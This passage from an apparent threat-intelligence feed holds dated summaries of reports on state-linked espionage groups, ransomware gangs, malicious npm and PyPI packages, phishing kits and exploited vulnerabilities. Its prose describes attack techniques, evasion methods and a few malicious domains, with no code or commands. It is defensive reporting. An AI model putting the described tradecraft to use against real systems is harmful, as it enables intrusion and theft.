Mustang Panda, a threat actor group, has developed new tools including two keyloggers (PAKLOG and CorKLOG) and an EDR evasion driver (SplatCloak). PAKLOG monitors keystrokes and clipboard data, using a custom encoding scheme. CorKLOG captures keystrokes, encrypts data with RC4, and establishes persistence through services or scheduled tasks. SplatCloak disables kernel-level notification callbacks for Windows Defender and Kaspersky drivers, employing obfuscation techniques like control flow flattening and mixed boolean arithmetic. Along with those tools, the group has been observed using updated versions of ToneShell and a new tool called StarProxy. ToneShell, a backdoor, now features changes in its FakeTLS C2 communication protocol and client identifier storage methods. StarProxy, a lateral movement tool, uses the FakeTLS protocol to proxy traffic and facilitate attacker communications.
UNC5174's evolution in China's ongoing cyber warfare: From SNOWLIGHT to VShell
released on 2025-04-16 @ 02:51:38 PM
Chinese state-sponsored threat actor UNC5174 has launched a new campaign using SNOWLIGHT malware and VShell, a Remote Access Trojan. The campaign targets Linux systems, employing domain squatting for phishing and social engineering. SNOWLIGHT acts as a dropper for VShell, which resides in memory as a fileless payload. The attackers use WebSockets for command and control communication, enhancing stealth. UNC5174's motivations include espionage and access brokering. The campaign has been active since November 2024, demonstrating sophisticated techniques such as memory manipulation and defense evasion. This development highlights the threat actor's expanding arsenal and continued support for Chinese government operations.
Inside BRUTED: Black Basta (RaaS) Used Automated Brute Forcing Framework to Target Edge Network Devices
released on 2025-04-16 @ 02:51:38 PM
Black Basta, a ransomware-as-a-service group, has been using an automated brute-forcing framework called BRUTED to target edge network devices since 2023. The framework performs internet scanning and credential stuffing against firewalls and VPN solutions in corporate networks. Black Basta prioritizes high-impact industries, particularly the Business Services sector, to amplify operational disruptions. The group's internal communications were leaked, exposing their infrastructure and operational details. BRUTED targets various remote-access and VPN solutions, using proxy rotation, credential generation, and distributed execution to scale attacks. Black Basta exploits vulnerabilities in edge devices for initial access, then targets ESXi hypervisors to encrypt file systems and disrupt virtual machines, maximizing operational impact and ransom leverage.
BRICKSTORM Backdoor Analysis: A Persistent Espionage Threat to European Industries
released on 2025-04-16 @ 02:51:37 PM
This analysis examines BRICKSTORM, an espionage backdoor linked to China-nexus cluster UNC5221. It details newly identified Windows variants, expanding on previous Linux presence. The backdoor, used in long-term espionage campaigns, targets European industries of strategic interest to China. BRICKSTORM provides file management and network tunneling capabilities, using multiple layers of encryption and leveraging cloud providers to evade detection. The analysis covers the backdoor's inner workings, including its command and control infrastructure, protocol details, and evasion techniques. It highlights the persistent nature of these intrusions and the challenges they pose to defensive measures. The document concludes with recommendations for detection and mitigation strategies.
Malicious PyPi Package Detected Stealing Crypto Tokens
released on 2025-04-16 @ 02:51:37 PM
A malicious PyPI package named ccxt-mexc-futures has been discovered by security researchers. This package claims to extend the capabilities of the legitimate CCXT library for cryptocurrency trading, specifically for futures trading on the MEXC exchange. However, it actually hijacks user orders and steals crypto tokens. The package overrides certain API functions, redirecting trading requests to a malicious server at greentreeone.com instead of the legitimate MEXC platform. It uses obfuscation techniques to hide its malicious code and tricks users into believing their orders are being processed normally. The attackers can potentially steal API keys, secrets, and other sensitive information used for crypto trading. Users are advised to revoke any compromised tokens and remove the malicious package immediately.
Interlock ransomware evolving under the radar
released on 2025-04-16 @ 02:00:11 PM
The Interlock ransomware group, active since September 2024, has shown adaptability and innovation in its tactics despite a relatively low victim count. They employ fake browser updates and the ClickFix technique for initial access, followed by a multi-stage attack chain involving PowerShell backdoors, credential stealers, and a custom Remote Access Trojan. The group targets various sectors across North America and Europe, conducting Big Game Hunting and double extortion campaigns. Interlock has been observed improving their tools, including evolving their PowerShell backdoor and modifying their ransom notes to emphasize legal repercussions. The group's focus on maintaining relevance while avoiding large-scale visibility suggests a strategic approach to their operations.
CrazyHunter Campaign Targets Taiwanese Critical Sectors
released on 2025-04-16 @ 02:00:08 PM
The CrazyHunter ransomware group has emerged as a significant threat, specifically targeting Taiwanese organizations in healthcare, education, and industrial sectors. The group employs sophisticated techniques, including the Bring Your Own Vulnerable Driver (BYOVD) method, to bypass security measures. They have expanded their toolkit by integrating open-source tools from GitHub, such as the Prince Ransomware Builder and ZammoCide. Approximately 80% of CrazyHunter's toolkit consists of open-source tools. The group's focus on Taiwan's critical sectors raises concerns about potential disruptions to essential services. Their evolving tactics and use of readily available tools highlight the need for enhanced cybersecurity measures to counter this emerging threat.
JScript to PowerShell: Breaking Down a Loader Delivering XWorm and Rhadamanthys
released on 2025-04-16 @ 05:57:23 AM
This analysis examines a sophisticated malware loader that utilizes JScript to launch obfuscated PowerShell code, ultimately delivering payloads such as XWorm and Rhadamanthys. The loader employs geofencing tactics, targeting victims in the United States with XWorm RAT, while deploying Rhadamanthys stealer to users outside the U.S. The attack chain involves multiple stages of obfuscation and deobfuscation, including decimal encoding and string manipulation. The final payload is injected into RegSvcs.exe using reflective loading techniques. The loader also performs various cleanup actions to evade detection and remove traces of its activity. Both XWorm and Rhadamanthys are advanced malware variants with capabilities ranging from DDoS attacks to cryptocurrency theft.
Server-Side Phishing: How Credential Theft Campaigns Are Hiding in Plain Sight
released on 2025-04-15 @ 08:46:39 PM
This analysis explores an ongoing phishing campaign targeting employee and member portals using a PHP-based phishing kit. The campaign has evolved from using client-side redirects to server-side credential validation, making detection more challenging. Multiple domains impersonating corporate login portals were identified, hosted on infrastructure linked to Chang Way Technologies Co. Limited. The phishing pages employ sophisticated tactics, including two-factor authentication bypasses and decoy content. The campaign's infrastructure and techniques suggest a persistent, possibly state-linked threat actor adapting their methods to evade detection and maintain access to enterprise environments.
Byte Bandits: How Fake PDF Converters Are Stealing More Than Just Your Documents
released on 2025-04-15 @ 08:46:37 PM
A sophisticated malware campaign exploits users' trust in online file conversion tools by impersonating the legitimate service pdfcandy.com. The attack involves fake PDF-to-DOCX converters that trick victims into executing a malicious PowerShell command, leading to the installation of Arechclient2, a variant of the SectopRAT information stealer. This malware is capable of harvesting sensitive data, including browser credentials and cryptocurrency wallet information. The attackers use deceptive tactics such as simulated processing, fake CAPTCHA prompts, and psychological manipulation to lower users' guards. The malware delivery process involves a complex redirection chain, ultimately leading to the download of a malicious payload disguised as 'adobe.zip'.
Threat actors misuse Node.js to deliver malware and other malicious payloads
released on 2025-04-15 @ 08:46:36 PM
Since October 2024, threat actors have been leveraging Node.js to deliver malware and payloads for information theft and data exfiltration. A recent malvertising campaign uses cryptocurrency trading themes to lure users into downloading malicious installers. The attack chain includes initial access, persistence, defense evasion, data collection, and payload delivery. The malware gathers system information, sets up scheduled tasks, and uses PowerShell for various malicious activities. Another emerging technique involves inline JavaScript execution through Node.js. Recommendations include educating users, monitoring Node.js execution, enforcing PowerShell logging, and implementing endpoint protection.
Newly Registered Domains Distributing SpyNote Malware
released on 2025-04-15 @ 07:35:32 PM
Cybercriminals are employing deceptive websites on newly registered domains to distribute AndroidOS SpyNote malware. These sites imitate the Google Chrome install page on the Google Play Store, tricking users into downloading SpyNote, a powerful Android remote access trojan. SpyNote is used for surveillance, data exfiltration, and remote control of infected devices. The investigation uncovered multiple domains, IP addresses, and APK files associated with this campaign. The malware utilizes various C2 endpoints for communication and data exfiltration, with functions designed to retrieve and manipulate device information, contacts, SMS, and applications.
HelloKitty Ransomware Resurfaced
released on 2025-04-15 @ 07:35:27 PM
The HelloKitty ransomware group, active since late 2020, has resurfaced with new variants in 2024 and potentially 2025. Originally forked from DeathRansom, HelloKitty targets Windows and Linux environments, appending .CRYPTED, .CRYPT, or .KITTY extensions to encrypted files. The group has used multiple TOR domains for negotiations and has been linked to high-profile attacks, including CD Projekt Red. Analysis reveals potential connections to China, despite earlier attributions to Ukraine. The ransomware employs sophisticated encryption techniques, including RSA-2048 and AES. Recent samples show evolving tactics, with increased focus on system discovery and process termination. HelloKitty has also been utilized by other threat actors, including Vice Society and Lapsus$. The group's continued activity and adaptations suggest ongoing relevance in the ransomware landscape.
Renewed APT29 Phishing Campaign Against European Diplomats
released on 2025-04-15 @ 06:49:19 PM
A sophisticated phishing campaign targeting European diplomatic entities has been uncovered, attributed to the Russia-linked threat group APT29. The attackers impersonate a major European foreign affairs ministry, sending fake invitations to wine tasting events. The campaign employs a new loader called GRAPELOADER, which is used for initial reconnaissance and payload delivery. Additionally, a new variant of the WINELOADER backdoor has been discovered, likely used in later stages of the attack. Both malware components share similarities in code structure and obfuscation techniques. The campaign focuses on European diplomatic targets, including non-European embassies in Europe, with some indications of limited targeting outside the region.
CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild
released on 2025-04-15 @ 03:39:43 AM
A critical vulnerability (CVE-2025-30406) in Gladinet CentreStack and Triofox software has been discovered and is being actively exploited. The flaw involves hardcoded cryptographic keys in configuration files, allowing attackers to abuse ASPX ViewState for remote code execution. Affected versions include CentreStack below 16.4.10315.56368 and Triofox below 16.4.10317.56372. Exploitation leads to immediate compromise with potential for privilege escalation. Mitigation involves patching or changing machineKey values. Post-exploitation activities include downloading malicious DLLs, lateral movement, and installation of remote access tools like MeshCentral. Immediate action is recommended for vulnerable servers exposed to the internet.
Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
released on 2025-04-14 @ 06:55:43 PM
Slow Pisces, a North Korean state-sponsored threat group, is targeting cryptocurrency developers through LinkedIn with malicious coding challenges. The group impersonates recruiters and sends malware disguised as project tasks, infecting systems with RN Loader and RN Stealer. Their campaign uses GitHub repositories containing adapted open-source projects in Python and JavaScript. The malware employs YAML deserialization and EJS rendering to execute arbitrary code from command-and-control servers. Slow Pisces has reportedly stolen over $1 billion from the cryptocurrency sector in 2023, using various methods including fake trading applications and supply chain compromises. The group's operational security is noteworthy, with payloads existing only in memory and deployed selectively.
Atomic and Exodus crypto wallets targeted in malicious npm campaign
released on 2025-04-14 @ 05:12:24 PM
A malicious npm package named pdf-to-office was discovered targeting cryptocurrency wallets. The package, posing as a PDF to Office converter, injects malicious code into locally installed Atomic and Exodus wallets. This attack modifies legitimate files to redirect crypto funds to the attacker's wallet. The campaign shows persistence, as removing the malicious package doesn't remove the injected code from the wallets. Multiple versions of both wallets were targeted, with the attackers adapting their code accordingly. This incident highlights the growing scope of software supply chain risks, particularly in the cryptocurrency industry, and emphasizes the need for improved monitoring of both source code repositories and locally deployed applications.
Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
released on 2025-04-14 @ 10:35:07 AM
Slow Pisces, a North Korean state-sponsored threat group, has launched a campaign targeting cryptocurrency developers using LinkedIn recruitment schemes and malicious coding challenges. The group impersonates recruiters, sending benign PDFs with job descriptions followed by coding tasks linked to compromised GitHub repositories. These repositories contain malware disguised as legitimate projects, using techniques like YAML deserialization and EJS rendering to execute malicious code. The campaign introduces new malware named RN Loader and RN Stealer, which gather victim information and potentially establish persistent access. This sophisticated approach has reportedly led to over $1 billion in cryptocurrency theft in 2023 alone.
Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware
released on 2025-04-13 @ 10:37:29 AM
A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.
A Deep Dive into Strela Stealer and how it Targets European Countries
released on 2025-04-13 @ 10:37:28 AM
Strela Stealer, an infostealer targeting email clients in specific European countries, has been active since late 2022. It focuses on exfiltrating credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily targeting Spain, Italy, Germany, and Ukraine. Recent attacks involve forwarding legitimate emails with malicious attachments. Strela Stealer employs multi-layer obfuscation and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific German-speaking countries. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.
Analyzing OBSCURE#BAT: Threat Actors Lure Victims into Executing Malicious Batch Scripts to Deploy Stealthy Rootkits
released on 2025-04-13 @ 10:37:27 AM
A stealthy malware campaign dubbed OBSCURE#BAT has been discovered, utilizing social engineering and deceptive file downloads to trick users into executing obfuscated code. The infection chain deploys a user-mode rootkit that manipulates system processes and registry entries to evade detection and maintain persistence. The malware, identified as r77 rootkit, hides files, processes, and registry keys with a specific prefix. It uses highly obfuscated batch scripts, PowerShell commands, and registry manipulation to establish persistence. The campaign targets English-speaking individuals through fake captchas, malvertising, and masquerading as legitimate software. The rootkit's ability to cloak malicious activities and inject into critical system processes makes it particularly dangerous and difficult to detect using conventional methods.
North Korean APT37 Mobile Spyware Discovered
released on 2025-04-12 @ 05:53:21 PM
A new Android spyware called KoSpy has been attributed to the North Korean group APT37 (ScarCruft). The malware, active since March 2022, targets Korean and English-speaking users by masquerading as utility apps, and has been distributed through Google Play and third-party app stores. KoSpy uses a two-stage C2 infrastructure, retrieving initial configurations from Firebase cloud databases. Via dynamically loaded plugins it can collect extensive data, including SMS messages, call logs, location, files, audio, and screenshots, and it can also record audio and perform keylogging. Evidence suggests infrastructure sharing with APT43 (Kimsuky), another North Korean state-sponsored group.
Detailed Analysis of DocSwap Malware Disguised as Security Document Viewer
released on 2025-04-12 @ 05:53:19 PM
A new malware called DocSwap, disguised as a document viewing authentication app, was discovered targeting South Korean mobile users. The malware, linked to a North Korean APT group, performs keylogging and information theft through accessibility services. It decrypts an obfuscated APK file, executes code from a DEX file, and communicates with a C2 server to receive malicious commands. The malware requests extensive permissions, maintains persistence, and performs various malicious activities including camera manipulation and audio recording. The C2 infrastructure initially displayed a phishing page impersonating CoinSwap, later showing characteristics associated with the Kimsuky group. The threat actor has been designated as puNK-004 by S2W TALON.
Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers
released on 2025-04-11 @ 03:42:11 PM
Mandiant discovered China-nexus espionage group UNC3886 deploying custom backdoors on Juniper Networks' Junos OS routers in mid-2024. The actor used TINYSHELL-based backdoors with various capabilities, including active and passive functions and log disabling. UNC3886 demonstrated advanced system knowledge, bypassing Junos OS security measures and injecting malicious code into legitimate processes. The group focused on maintaining long-term network access, targeting defense, technology, and telecommunication organizations in the US and Asia. This activity highlights the ongoing threat of China-nexus actors compromising networking infrastructure with sophisticated malware ecosystems.
Ransomware Initial Access Brokers Exposed
released on 2025-04-11 @ 09:39:38 AM
An investigation into a brute force attack on an exposed Remote Desktop server led to the discovery of a larger ransomware ecosystem, particularly initial access brokers. The attack began with domain enumeration and successful compromise of an account from multiple IP addresses. The threat actor's unusual behavior of searching for credentials in files prompted further investigation. Analysis of the IP addresses revealed connections to Hive ransomware and BlackSuit. Pivoting from TLS certificates uncovered a network of geographically distributed infrastructure with a pattern of domain names. The case highlights the importance of thorough analysis in incident response and provides insights into the operations and motivations of ransomware actors.
Evasive Campaign Pushing Legion Loader Malware
released on 2025-04-11 @ 09:01:47 AM
A highly evasive web campaign is exploiting clipboard hijacking to trick users into running MSI files containing Legion Loader malware. The campaign employs multiple cloaking strategies, including captcha pages, disguised blog sites, and dynamic download URLs. The malicious script instructs victims to paste content into a Run window, which downloads and displays the MSI file. The campaign uses TDS traffic or affiliate links with short-lived parameters to lead victims to malicious download pages. When accessed without valid parameters, the URLs display benign content. The campaign's infrastructure includes 76 domains resolving to a single IP address, all disguised as blog sites.
Unraveling the U.S. toll road smishing scams
released on 2025-04-11 @ 03:27:42 AM
A widespread financial theft SMS phishing campaign targeting toll road users across multiple U.S. states has been observed since October 2024. The attacks impersonate automatic payment services like E-ZPass, claiming outstanding bills under $5 USD and warning of late fees. Victims are directed to spoofed domains where they are prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The kit's developer offers tutorials and services through Telegram channels and a YouTube channel. The ongoing campaign has targeted at least eight states, including Washington, Florida, Pennsylvania, and Texas, using typosquatted domains resolving to specific IP addresses.
Shuckworm Targets Foreign Military Mission Based in Ukraine
released on 2025-04-10 @ 07:46:39 PM
Russian-linked cyber-espionage group Shuckworm appears to be targeting a Western military mission based in Ukraine, according to research by Symantec and its partner, the UK-based security firm.
Amazon Gift Card Email Hooks Microsoft Credentials
released on 2025-04-10 @ 07:32:32 PM
The Cofense Phishing Defense Center (PDC) has identified a new credential phishing campaign that uses an Amazon e-gift card to harvest Microsoft login credentials from unsuspecting recipients in 2025.
Operation Sea Elephant: The Dying Walrus Wandering the Indian Ocean
released on 2025-04-10 @ 06:50:51 PM
The CNC group, with South Asian origins, has been targeting domestic teachers, students, and research institutions. Their operation, named 'sea elephant', aims to spy on scientific research achievements in the ocean field. The group employs various tactics, including spear-phishing emails, IM software exploitation, and customized plug-ins. Their malware includes remote command execution backdoors, USB flash drive propagation tools, keyloggers, and file stealers. The attackers use GitHub APIs and steganographic techniques to avoid detection. The operation's focus on ocean-related research suggests a nation's determination to dominate the Indian Ocean region. Additionally, a related campaign, UTG-Q-011, targets areas such as laser science and aerospace.
Blind Eagle: ...And Justice for All
released on 2025-04-10 @ 06:50:45 PM
Check Point Research uncovered ongoing campaigns by Blind Eagle (APT-C-36) targeting Colombian institutions since November 2024. The group utilized malicious .url files, similar to CVE-2024-43451, to deliver HeartCrypt-packed malware and Remcos RAT. Campaigns infected over 1,600 victims in a single instance. Blind Eagle exploited legitimate platforms like Google Drive and GitHub for distribution. The group's rapid adaptation to new vulnerabilities and use of underground tools highlight its sophistication. Operation in the UTC-5 timezone suggests a South American origin. An operational failure revealed past phishing activities targeting Colombian banks, compromising over 8,000 entries of personal data.
March 2025 Trends Report on Phishing Emails
released on 2025-04-10 @ 06:50:39 PM
The report analyzes phishing email trends in March 2025, revealing that phishing attacks constituted 59% of email threats. Attackers primarily used HTML scripts to mimic login pages and promotional content, aiming to steal user credentials. The analysis covers distribution statistics, Korean phishing email patterns, and case studies of different attachment formats. Document attachments were found to contain hidden malicious files exploiting vulnerabilities, while compressed script files saw an increase in distribution. The report provides insights into attachment file extensions, recent distribution trends, and detailed analyses of specific phishing email attacks to help users identify and mitigate these threats.
ViperSoftX Malware Distributed by Arabic-Speaking Threat Actor
released on 2025-04-10 @ 06:50:39 PM
An Arabic-speaking threat actor has been distributing ViperSoftX malware to Korean victims since April 1, 2025. The malware, typically spread through cracked software or torrents, operates as a PowerShell script and communicates with C&C servers. The campaign involves downloading additional malware, including a VBS downloader, malicious PowerShell script, PureCrypter, and Quasar RAT. The attackers use Arabic comments in their code and employ various techniques to evade detection, such as adding Windows Defender exception paths. The PowerShell downloader ensures administrator privileges and bypasses security software. PureCrypter, a commercial .NET packer, is used as a downloader, while Quasar RAT provides remote access capabilities. Users are advised to avoid downloading software from torrent sites and to keep their antivirus solutions updated to prevent infection.
March 2025 APT Group Trends (South Korea)
released on 2025-04-10 @ 06:50:35 PM
This intelligence report analyzes Advanced Persistent Threat (APT) attacks in South Korea during March 2025. The majority of attacks were classified as spear phishing, with LNK file distribution being the most prevalent method. Two types of LNK-based attacks were identified: Type A, which uses a CAB file with malicious scripts, and Type B, which downloads a CAB file containing a malicious Python script. Both types employ obfuscation techniques and execute multiple stages to perform various malicious activities, including information leakage and additional malware downloads. The attacks often use decoy files to appear legitimate and target specific individuals or groups with carefully crafted emails.
Unraveling the U.S. toll road smishing scams
released on 2025-04-10 @ 06:13:32 PM
Since October 2024, a widespread financial theft SMS phishing campaign has been targeting toll road users across multiple U.S. states. The attackers impersonate automatic payment services like E-ZPass, sending SMS notifications for small outstanding bills under $5 USD. Victims are directed to spoofed domains where they're prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The actors have targeted at least eight states, including Washington, Florida, Pennsylvania, and others. The phishing infrastructure involves typosquatted domains resolving to specific IP addresses. The smishing kits are being sold on Telegram channels, with the developer offering various services and tutorials related to web development and server setup.
Atomic and Exodus crypto wallets targeted in malicious npm campaign
released on 2025-04-10 @ 06:13:30 PM
Threat actors are employing new techniques to target the cryptocurrency community by uploading packages to popular open source repositories that apply malicious 'patches' to local versions of legitimate libraries. A recent campaign launched on April 1 published a package called 'pdf-to-office' on npm, which injected malicious code into locally installed Atomic Wallet and Exodus crypto wallet software. This attack overwrote existing files, allowing attackers to swap out intended wallet destination addresses with their own. The malicious package was designed to target specific versions of the wallets and included persistence mechanisms. This campaign is part of a larger trend of sophisticated software supply chain attacks targeting the cryptocurrency industry, highlighting the need for improved monitoring and security measures in both commercial and open-source software.
Smishing Triad: Chinese eCrime Group Targets 121+ Countries, Introduces New Banking Phishing Kit
released on 2025-04-10 @ 06:13:30 PM
The Chinese eCrime group Smishing Triad has launched a global SMS phishing campaign targeting over 121 countries across various industries. Their infrastructure generates over one million page visits in 20 days, averaging 50,000 daily. The group has introduced a new 'Lighthouse' phishing kit focusing on banking and financial organizations, particularly in Australia and the Asia-Pacific region. Smishing Triad claims to have '300+ front desk staff worldwide' supporting their operations. They frequently rotate domains, with approximately 25,000 active during any 8-day period. The majority of phishing sites are hosted by Chinese companies Tencent and Alibaba. The campaign primarily targets postal, logistics, telecommunications, transportation, finance, retail, and public sectors.
Newly Registered Domains Distributing SpyNote Malware
released on 2025-04-10 @ 06:13:30 PM
Deceptive websites hosted on newly registered domains are being used to deliver AndroidOS SpyNote malware, mimicking the Google Chrome install page on the Google Play Store. The campaign utilizes a mix of English and Chinese-language delivery sites, with Chinese-language comments in the code. The malware is distributed through a two-stage installation process, using an APK dropper to deploy the core SpyNote RAT. SpyNote is a potent Android remote access trojan capable of extensive surveillance, data exfiltration, and remote control. It aggressively requests numerous intrusive permissions, allowing for theft of sensitive data and significant remote access capabilities. The malware's keylogging functionality and ability to manipulate calls, activate cameras and microphones, and remotely wipe data make it a formidable tool for espionage and cybercrime.
Beware! Fake 'NextGen mParivahan' Malware Returns
released on 2025-04-09 @ 05:43:36 PM
A new variant of the fake NextGen mParivahan malware has emerged, exhibiting enhanced stealth and data theft capabilities. The malware, disguised as a government traffic notification system, tricks users into downloading a malicious app that requests extensive permissions. This latest version targets messages from social media, communication, and e-commerce apps, posing a greater threat to user privacy. It employs advanced techniques such as malformed APKs, multi-stage dropper-payload architectures, and dynamic C2 generation to evade detection. The malware steals sensitive data, including SMS messages and notification content, uploading it to Firebase or a C2 server. Its ability to access notifications, SMS, and app data significantly risks user privacy, highlighting the need for improved security awareness and analysis tools.
Exploitation of CLFS zero-day leads to ransomware activity
released on 2025-04-09 @ 05:43:35 PM
A zero-day elevation of privilege vulnerability in Windows Common Log File System (CLFS) has been exploited against targets in IT, real estate, finance, software, and retail sectors across multiple countries. The exploit, deployed by PipeMagic malware and attributed to Storm-2460, enables privilege escalation and ransomware deployment. The vulnerability, CVE-2025-29824, was patched on April 8, 2025. The attack involves downloading malicious MSBuild files, using PipeMagic, and exploiting CLFS to inject payloads into system processes. Post-exploitation activities include credential theft and ransomware deployment, with similarities to RansomEXX. Microsoft recommends immediate patching and provides mitigation strategies, detection methods, and hunting queries to counter this threat.
Sapphire Werewolf refines Amethyst stealer to attack energy companies
released on 2025-04-09 @ 03:50:04 PM
The Sapphire Werewolf cluster has upgraded its toolkit with a new version of the Amethyst stealer, targeting energy companies through phishing emails. The enhanced malware features advanced checks for virtualized environments and uses Triple DES for string encryption. The attack involves distributing a malicious attachment disguised as an official memo, which contains a C#-based loader protected with .NET Reactor. The Amethyst stealer collects extensive system data, credentials from various applications, and documents from compromised systems. The threat actor's sophisticated approach includes improved evasion techniques and data exfiltration methods, posing a significant risk to targeted organizations.
NEPTUNE RAT: An advanced Windows RAT with System Destruction Capabilities and Password Exfiltration from 270+ Applications
released on 2025-04-09 @ 07:52:27 AM
Neptune RAT, a sophisticated Windows-based remote access trojan, has emerged with advanced capabilities including system destruction and password exfiltration from over 270 applications. It employs PowerShell commands for deployment, leveraging catbox.moe for hosting malicious scripts. The malware incorporates anti-analysis techniques, persistence methods, and dangerous features such as ransomware, crypto clipping, and live desktop monitoring. It uses obfuscation, including Arabic characters, to evade detection. The RAT's modular structure allows for various malicious activities, including clipboard manipulation, email credential theft, and Master Boot Record corruption. Its distribution through platforms like GitHub and its evolving nature pose significant risks to both individuals and organizations.
Scattered Spider: Still Hunting for Victims in 2025
released on 2025-04-09 @ 07:51:37 AM
Scattered Spider, a notorious hacking collective, continues to actively target victims in 2025. The group has expanded its focus to include services like Klaviyo, HubSpot, and Pure Storage, while targeting high-profile brands such as Audemars Piguet, Chick-fil-A, and Twitter/X. Silent Push researchers have identified five unique phishing kits used by Scattered Spider since 2023, with some undergoing updates. A new version of Spectre RAT has been discovered, along with the acquisition of a domain previously owned by Twitter/X. Despite arrests of several members in 2024, Scattered Spider has adapted its tactics, including the use of dynamic DNS providers and updated phishing kits. The group continues to employ sophisticated social engineering attacks to obtain credentials and multi-factor authentication tokens.
Exploitation of CLFS zero-day leads to ransomware activity
released on 2025-04-09 @ 02:22:03 AM
A zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) has been exploited against targets in various sectors across multiple countries. The exploit, deployed by PipeMagic malware and attributed to Storm-2460, enables privilege escalation and ransomware deployment. Post-exploitation activities include credential theft and file encryption. The vulnerability, tracked as CVE-2025-29824, has been patched. Mitigation strategies include applying security updates, enabling cloud-delivered protection, and implementing advanced security measures. Multiple detection methods and hunting queries are provided for identifying and responding to this threat.
Pick your Poison - A Double-Edged Email Attack
released on 2025-04-08 @ 09:41:51 PM
A sophisticated cyber-attack has been identified by the Cofense Phishing Defense Center, combining phishing techniques targeting Office365 credentials with malware delivery. The campaign uses a file deletion reminder as bait, exploiting a legitimate file-sharing service to increase credibility. Users are led to a fake Microsoft login page or prompted to download malware disguised as a OneDrive installer. The attack employs ConnectWise RAT, a legitimate remote administration tool exploited for malicious purposes. The malware establishes persistence through system services and registry modifications, highlighting the need for enhanced user awareness and education to combat such dual-threat approaches.
Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks
released on 2025-04-08 @ 07:06:14 PM
Pakistan-linked SideCopy APT has expanded its targeting to include Indian railways, oil & gas, and external affairs ministries. The group has shifted from HTA files to MSI packages for staging, employing advanced techniques like DLL side-loading and reflective loading. They are leveraging customized open-source tools such as Xeno RAT and Spark RAT, and deploying a new CurlBack RAT. The attackers use compromised domains and fake sites for credential phishing and payload hosting. New tactics include reflective loading, AES decryption via PowerShell, and multi-platform attacks targeting both Windows and Linux systems. The group continues to evolve its methods to enhance persistence and evade detection.
A miner and the ClipBanker Trojan being distributed via SourceForge
released on 2025-04-08 @ 07:06:13 PM
A unique malware distribution scheme exploiting SourceForge has been discovered. The attackers create a seemingly legitimate project on sourceforge.net, which automatically generates a sourceforge.io subdomain. This subdomain is then used to host a malicious page that tricks users into downloading a compressed archive containing malware. The infection chain involves multiple stages, including the use of password-protected archives, Visual Basic scripts, and PowerShell commands. The main payloads are a cryptocurrency miner and ClipBanker, a Trojan that replaces cryptocurrency wallet addresses in the clipboard. The campaign primarily targets Russian-speaking users, with 90% of potential victims located in Russia.
Mining in Plain Sight: The VS Code Extension Cryptojacking Campaign
released on 2025-04-08 @ 10:51:33 AM
A sophisticated cryptomining campaign has been discovered targeting developers through seemingly legitimate VS Code extensions. The campaign, potentially reaching over one million installations, involves fake extensions published by three different authors. These extensions secretly download a PowerShell script that disables Windows security, establishes persistence, and installs an XMRig cryptominer. The most successful fake extension gained 189K installs. The attackers created a multi-stage attack, even installing legitimate extensions they impersonated to avoid suspicion. The campaign published ten different malicious extensions, with the top three showing unusually high install counts, suggesting artificial inflation. The extensions share identical code and communicate with the same C2 server. The PowerShell script sets up persistence mechanisms, disables Windows security services, and attempts privilege escalation.
Grandoreiro Trojan Distributed via Contabo-Hosted Servers in Phishing Campaigns
released on 2025-04-08 @ 10:32:52 AM
Cybercriminals are reviving the Grandoreiro banking trojan, targeting users in Latin America and Europe through large-scale phishing campaigns. The malware is distributed via emails impersonating tax agencies, leading victims to download malicious payloads from Contabo-hosted servers and Mediafire. The attack chain involves obfuscated VBS scripts and a Delphi-based EXE that steals credentials and connects to a C2 server. The campaign employs dynamic URLs, social engineering, and various obfuscation techniques to evade detection. Users in Mexico, Argentina, and Spain are primary targets, with the malware searching for Bitcoin wallet directories and system information. Frequent changes to subdomains under contaboserver[.]net are used to avoid detection.
Lazarus Expands Malicious npm Campaign: 11 New Packages Add Malware Loaders and Bitbucket Payloads
released on 2025-04-08 @ 10:32:07 AM
North Korean threat actors have expanded their presence in the npm ecosystem, publishing additional malicious packages that deliver the BeaverTail malware and introduce new remote access trojan loader functionality. The campaign, known as Contagious Interview, aims to compromise developer systems, steal sensitive data, and maintain access to compromised environments. The actors have created new npm accounts and deployed malicious code across npm, GitHub, and Bitbucket. The expanded campaign includes 11 new packages with over 5,600 downloads, using hexadecimal string encoding to evade detection. The malware targets browser data, macOS keychain, and cryptocurrency wallets. The threat actors are diversifying their tactics, using multiple malware variants and obfuscation techniques to ensure resilience and evade detection.
CrazyHunter: The Rising Threat of Open-Source Ransomware
released on 2025-04-08 @ 10:30:59 AM
A ransomware attack on Mackay Memorial Hospital in Taiwan highlights the growing use of publicly available offensive tools by threat actors. The CrazyHunter ransomware, built using the Prince Ransomware builder from GitHub, encrypted over 600 devices across two hospital branches. The attack, likely initiated via a USB device, employed various tools for defense evasion, encryption, and lateral movement. The threat actor used a vulnerable Zemana driver to disable security products, utilized the Prince Ransomware builder for file encryption, and leveraged SharpGPOAbuse for lateral movement. The incident demonstrates the increasing accessibility of cyber attack tools, enabling even less skilled actors to launch sophisticated attacks. This trend poses significant challenges for attribution and defense against ransomware threats.
The Wagmi Manual: Copy, Paste, and Profit
released on 2025-04-08 @ 10:29:53 AM
